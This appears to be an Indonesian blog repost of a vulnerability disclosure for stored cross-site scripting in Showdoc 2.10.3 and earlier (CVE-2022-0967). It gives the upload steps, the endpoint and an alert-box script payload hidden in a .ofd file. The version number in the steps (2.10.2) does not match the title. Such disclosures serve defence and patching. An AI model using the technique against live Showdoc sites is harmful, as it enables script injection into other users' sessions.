Showdoc 2.10.3 Pembuatan Skrip Lintas Situs

  • Whatsapp
Croogo 3.0.2 Cross Site Scripting
Croogo Cross Site Scripting

News.nextcloud.asia

Showdoc versi 2.10.3 dan di bawahnya mengalami kerentanan skrip lintas situs yang persisten.

SHA-256 | 9794c5dc51ff960938f2de93bd6a7f9916dd3f208482681592b1d965acd7691a

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file

filename = "payload.ofd"
payload = "<script>alert(1)</script>"

2. Login to showdoc v2.10.2 and go to file library

Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.